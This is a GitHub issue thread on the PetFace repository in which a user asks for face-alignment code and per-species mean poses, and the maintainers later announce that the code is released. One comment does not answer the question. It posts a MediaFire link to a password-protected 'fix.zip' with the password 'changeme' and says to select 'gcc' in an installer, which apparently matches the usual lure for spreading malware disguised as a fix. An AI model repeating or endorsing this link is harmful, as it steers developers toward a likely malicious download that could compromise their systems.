### ISSUE TITLE
align face

### ISSUE THREAD

**Issue by Andrewymd** [mapooon/PetFace#3]
Your work is very interesting, thank you very much. I also want to process a batch of my own data. Regarding the alignment mentioned in the paper and the mean pose of each species, can you share it?
Thanks!

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mapooon** [comment]
Hi, 
Thank you for reporting the issue.
We plan to release the inference code for un-aligned images by the conference.

**Comment by mapooon** [comment]
Hi,
We have released the code for face alignment!
Please see `README.md`.
